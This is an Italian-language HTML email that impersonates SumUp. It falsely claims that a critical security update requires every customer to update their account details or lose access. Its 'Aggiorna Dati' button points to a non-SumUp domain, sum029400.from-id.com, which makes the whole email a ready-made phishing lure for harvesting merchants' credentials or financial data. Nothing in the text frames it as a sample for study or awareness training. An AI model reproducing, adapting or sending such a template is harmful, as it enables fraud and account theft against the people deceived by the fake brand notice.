<!DOCTYPE html>

<html lang="it"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Aggiornamento Importante - SumUp</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .container {
            background-color: white;
            width: 100%;
            max-width: 600px;
            padding: 20px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            border-radius: 8px;
        }
        .logo img {
            max-width: 100px;
        }
        h1 {
            font-size: 24px;
            color: #000;
        }
        p {
            font-size: 16px;
            color: #333;
            line-height: 1.6;
        }
        .button {
            display: block;
            width: 100%;
            max-width: 250px;
            margin: 20px auto;
            padding: 15px;
            text-align: center;
            background-color: #000;
            color: white;
            text-decoration: none;
            border-radius: 8px;
            font-size: 16px;
        }
        .footer {
            margin-top: 20px;
            font-size: 14px;
            color: #666;
        }
    </style>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
</head>
<body style="font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh">
    <div style="background-color: white;
            width: 100%;
            max-width: 600px;
            padding: 20px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            border-radius: 8px" class="container">
 <img width="408" height="123" align="baseline" style="width: 138px; height: 53px;" alt="" src="cid:sm.png" border="0" hspace="0">       
   <br>     
        <h1 style="font-size: 24px;
            color: #000">Aggiornamento importante: SumUp</h1>
        <p style="font-size: 16px;
            color: #333;
            line-height: 1.6">
            A causa di un aggiornamento di sicurezza cruciale, tutti i clienti SumUp sono tenuti ad aggiornare i propri dati account. 
            Questo <span>è</span> necessario per garantire la sicurezza del tuo account. Se non aggiorni i tuoi dati, potresti perdere 
            definitivamente l'accesso al tuo account finché non lo avrai fatto.
        </p>
        <p style="font-size: 16px;
            color: #333;
            line-height: 1.6">
            Aggiorna i tuoi dati in tempo tramite il pulsante sottostante "Aggiorna Dati".
        </p>
        <a style="display: block;
            width: 100%;
            max-width: 250px;
            margin: 20px auto;
            padding: 15px;
            text-align: center;
            background-color: #000;
            color: white;
            text-decoration: none;
            border-radius: 8px;
            font-size: 16px" class="button" href="http://sum029400.from-id.com">Aggiorna Dati</a>
        <div style="margin-top: 20px;
            font-size: 14px;
            color: #666" class="footer">
            <p style="font-size: 16px;
            color: #333;
            line-height: 1.6">Cordiali saluti,<br>Il tuo team SumUp</p>
        </div>
    </div>


</body></html>